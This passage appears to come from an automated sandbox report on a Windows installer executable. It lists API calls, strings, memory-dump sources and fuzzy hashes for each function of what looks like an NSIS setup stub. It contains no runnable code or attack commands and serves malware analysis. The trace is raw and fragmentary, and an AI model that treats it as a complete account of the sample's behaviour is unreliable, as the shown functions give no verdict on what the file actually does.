Instruction Fuzzy Hash: F30281B0A00209AFDB20DF54DD45AAE7BB5FB84315F10813AF610BA2E1D7789E42DF58

Function 004042B1 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404300
SetWindowTextA.USER32(00000000,?), ref: 0040432A
SHBrowseForFolderA.SHELL32(?,0041F0B0,?), ref: 004043DB
CoTaskMemFree.OLE32(00000000), ref: 004043E6
lstrcmpiA.KERNEL32(Call,Slibrighederne Setup: Installing), ref: 00404418
lstrcatA.KERNEL32(?,Call), ref: 00404424
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404436

Part of subcall function 004053B5: GetDlgItemTextA.USER32(?,?,00000400,0040446D), ref: 004053C8

Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\xLDz0WPZYc.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
Part of subcall function 00405E28: CharNextA.USER32(?,"C:\Users\user\Desktop\xLDz0WPZYc.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
Part of subcall function 00405E28: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2

GetDiskFreeSpaceA.KERNEL32(0041ECA8,?,?,0000040F,?,0041ECA8,0041ECA8,?,00000000,0041ECA8,?,?,000003FB,?), ref: 004044F3
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040450E

Part of subcall function 00404667: lstrlenA.KERNEL32(Slibrighederne Setup: Installing,Slibrighederne Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
Part of subcall function 00404667: wsprintfA.USER32 ref: 0040470D
Part of subcall function 00404667: SetDlgItemTextA.USER32(?,Slibrighederne Setup: Installing), ref: 00404720

Strings

C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 00404401
Slibrighederne Setup: Installing, xrefs: 004043AE, 00404411
liy, xrefs: 004042B7
A, xrefs: 004043D4
Call, xrefs: 00404412, 00404417, 00404422

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Studerekammermenneskes$Call$Slibrighederne Setup: Installing$liy
API String ID: 2624150263-860725345
Opcode ID: 91bfd2be80532f9d84de11e62587bd6305631a6878a96e32016dec978ead2281
Instruction ID: bbf5d18d822f9ae48c727ed4067559616aa27203017815afcead8a6077e661fe
Opcode Fuzzy Hash: 91bfd2be80532f9d84de11e62587bd6305631a6878a96e32016dec978ead2281
Instruction Fuzzy Hash: 26A172B1900208ABDB11DFA6CD45BAF77B8EF84315F10843BF605B62D1D77C9A418B69

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407384,?,?,00407374,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040208B
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407374,?,?), ref: 00402143

Strings

C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 004020CB

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\Studerekammermenneskes
API String ID: 123533781-3606720462
Opcode ID: 39794b821fe21fb85c1b2fd3ce7377877cfb5e2fe78928dd9364a207427fc901
Instruction ID: d4c62fdc28843dfc30489809ccaf5da6a3b2e007b03a33f3ec024107d8c1ad9a
Opcode Fuzzy Hash: 39794b821fe21fb85c1b2fd3ce7377877cfb5e2fe78928dd9364a207427fc901
Instruction Fuzzy Hash: 20417D71A00209BFCB00EFA4CE88E9E7BB5BF48314B2042A9F911FB2D0D6799D41DB54

Function 00402645 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: e5f9e7987e63e616f1326238460cb69c26cb86f40414b42305070d6d373339f0
Instruction ID: e6850a469ed090b17ef1dde7e6b5e911daaadda975b469663bbec5c58d3b5f53
Opcode Fuzzy Hash: e5f9e7987e63e616f1326238460cb69c26cb86f40414b42305070d6d373339f0
Instruction Fuzzy Hash: B4F0A772604110ABD700E7749A49AEE7778DB51314F6045BBE141E20C1D3B85A41DA2A

Function 00403FBC Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404047
GetDlgItem.USER32(00000000,000003E8), ref: 0040405B
SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404079
GetSysColor.USER32(?), ref: 0040408A
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404099
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040A8
lstrlenA.KERNEL32(?), ref: 004040AB
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040BA
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040CF
GetDlgItem.USER32(?,0000040A), ref: 00404131
SendMessageA.USER32(00000000), ref: 00404134
GetDlgItem.USER32(?,000003E8), ref: 0040415F
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040419F
LoadCursorA.USER32(00000000,00007F02), ref: 004041AE
SetCursor.USER32(00000000), ref: 004041B7
ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,?), ref: 004041CA
LoadCursorA.USER32(00000000,00007F00), ref: 004041D7
SetCursor.USER32(00000000), ref: 004041DA
SendMessageA.USER32(00000111,?,00000000), ref: 00404206
SendMessageA.USER32(?,00000000,00000000), ref: 0040421A

Strings

open, xrefs: 004041C2
N, xrefs: 0040414D
liy, xrefs: 00404110
Call, xrefs: 0040418A

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$liy$open
API String ID: 3615053054-3381597134
Opcode ID: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
Instruction ID: 7c7fff9fd1e172092069843c90e077616bef9326b7299cf1cce5c9f34bd91e75
Opcode Fuzzy Hash: 8a9ae112f1df4d10fa1381c7e2026d7722a962e20b7826b4dde34b5403f790f5
Instruction Fuzzy Hash: 8961E5B1A40209BFEB109F60DD45F6A7B78FB44741F10403AFB05BA2D1C7B8A951CB99

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Slibrighederne Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Slibrighederne Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Slibrighederne Setup
API String ID: 941294808-2379504175
Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5

Function 004058F5 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00421A68,NUL,?,00000000,?,00000000,?,00405A99,?,?,?,0040563C,?,00000000,000000F1,?), ref: 00405905
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00405A99,?,?,?,0040563C,?,00000000,000000F1,?), ref: 00405929
GetShortPathNameA.KERNEL32(00000000,00421A68,00000400), ref: 00405932

Part of subcall function 004057B3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057C3
Part of subcall function 004057B3: lstrlenA.KERNEL32(004059E2,?,00000000,004059E2,00000000,[Rename],00000000,00000000,00000000), ref: 004057F5

GetShortPathNameA.KERNEL32(?,00421E68,00000400), ref: 0040594F
wsprintfA.USER32 ref: 0040596D
GetFileSize.KERNEL32(00000000,00000000,00421E68,C0000000,?,00421E68,?,?,?,?,?), ref: 004059A8
GlobalAlloc.KERNEL32(?,0000000A), ref: 004059B7
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004059EF
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421668,00000000,-0000000A,00409388,00000000,[Rename],00000000,00000000,00000000), ref: 00405A45
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405A57
GlobalFree.KERNEL32(00000000), ref: 00405A5E
CloseHandle.KERNEL32(00000000), ref: 00405A65

Part of subcall function 0040584E: GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\xLDz0WPZYc.exe,80000000,00000003), ref: 00405852
Part of subcall function 0040584E: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405874

Strings

%s=%s, xrefs: 00405963
NUL, xrefs: 004058FF
[Rename], xrefs: 004059D7, 004059E9

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 1265525490-4148678300
Opcode ID: 1c7b9dc5b9d373c95b3dd538fd3a589de0fc08670cd7a038be037713092c8044
Instruction ID: e8cacc7e92f5bf2d1a44c635cad04a40df604100f7174d9fb2de66c5d7927451
Opcode Fuzzy Hash: 1c7b9dc5b9d373c95b3dd538fd3a589de0fc08670cd7a038be037713092c8044
Instruction Fuzzy Hash: 60410171704B19BFD3206B215C89F6B3A5CDB45714F14023ABD01F62D2D67CA8018E7E

Function 00405E28 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\xLDz0WPZYc.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
CharNextA.USER32(?,"C:\Users\user\Desktop\xLDz0WPZYc.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2

Strings

*?|<>/":, xrefs: 00405E70
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E29, 00405E2E
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 00405E64

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\xLDz0WPZYc.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2070423517
Opcode ID: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
Instruction ID: a4a2cc105071513804232ace241bb9437e981183223a596247e33b0ed04e6b88
Opcode Fuzzy Hash: 936ec53846ae3d4c979f0b86072daa16fddb5806f2a9e6e631d156a7122fd3c6
Instruction Fuzzy Hash: F111C461805B9129FB3217248C44B776F89CB96B60F18047BE5C4B22C3D77C5E428EAD

Function 00403EDA Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403EF7
GetSysColor.USER32(00000000), ref: 00403F13
SetTextColor.GDI32(?,00000000), ref: 00403F1F
SetBkMode.GDI32(?,?), ref: 00403F2B
GetSysColor.USER32(?), ref: 00403F3E
SetBkColor.GDI32(?,?), ref: 00403F4E
DeleteObject.GDI32(?), ref: 00403F68
CreateBrushIndirect.GDI32(?), ref: 00403F72

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: d122295a95d7a35518708bb3646b4b032600d4a0088814026e1a2530b61c3467
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: 04218471904705ABC7219F68DD08B4BBFF8AF01715F048A29E996E22E1D738EA44CB55

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(?,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(?,?), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
Instruction ID: fe65b043c70383bd2b49c92c90746d4950a0c6047a38c1932a2dc3020861886a
Opcode Fuzzy Hash: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
Instruction Fuzzy Hash: F6418BB1108711EFF720DFA48884B5BB7F8FF443D1F218929F946D61A9DB34AA448B61

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B9
GlobalFree.KERNEL32(00000000), ref: 100024F3

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
Instruction ID: 82133e1bc6da927614d5bcfc3b496831b4cb396c3e6da136b8b2dca3161aa200
Opcode Fuzzy Hash: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
Instruction Fuzzy Hash: 75319CB1504251EFF722CF94CCC4C6B7BBDEB852D4B128569FA4193228DB31AC54DB62

Function 00404771 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040478C
GetMessagePos.USER32 ref: 00404794
ScreenToClient.USER32(?,?), ref: 004047AE
SendMessageA.USER32(?,00001111,00000000,?), ref: 004047C0
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047E6

Strings

f, xrefs: 004047C2

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: 7320c3ca21a199b12554e0b126592fdbaa3119cb9dfe1c5a5544a419b0626cb6
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 7B019275D00218BADB00DB94DC85FFEBBBCAF45711F10412BBA11B71C0C3B465018BA5

Function 00402B42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5D
MulDiv.KERNEL32(0008CB41,?,0008CB45), ref: 00402B88
wsprintfA.USER32 ref: 00402B98
SetWindowTextA.USER32(?,?), ref: 00402BA8
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA

Strings

verifying installer: %d%%, xrefs: 00402B92

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7c6b42b6a0cc2db989286670b759c7d1809337f1b1d19a01d5db9df498489f5d
Instruction ID: 2a4a5d9d20a729fd9d452e33c08772ea7119627e62a29752c404fbbb79c7976e
Opcode Fuzzy Hash: 7c6b42b6a0cc2db989286670b759c7d1809337f1b1d19a01d5db9df498489f5d
Instruction Fuzzy Hash: 5601F471940209BBDF14AF60DD49EAE3779BB04345F008039FA06B52D0D7B9A955CB59

Function 00404667 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Slibrighederne Setup: Installing,Slibrighederne Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404582,000000DF,00000000,00000400,?), ref: 00404705
wsprintfA.USER32 ref: 0040470D
SetDlgItemTextA.USER32(?,Slibrighederne Setup: Installing), ref: 00404720

Strings

Slibrighederne Setup: Installing, xrefs: 004046F7, 004046FC, 00404702, 00404716
%u.%u%s%s, xrefs: 004046EF

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

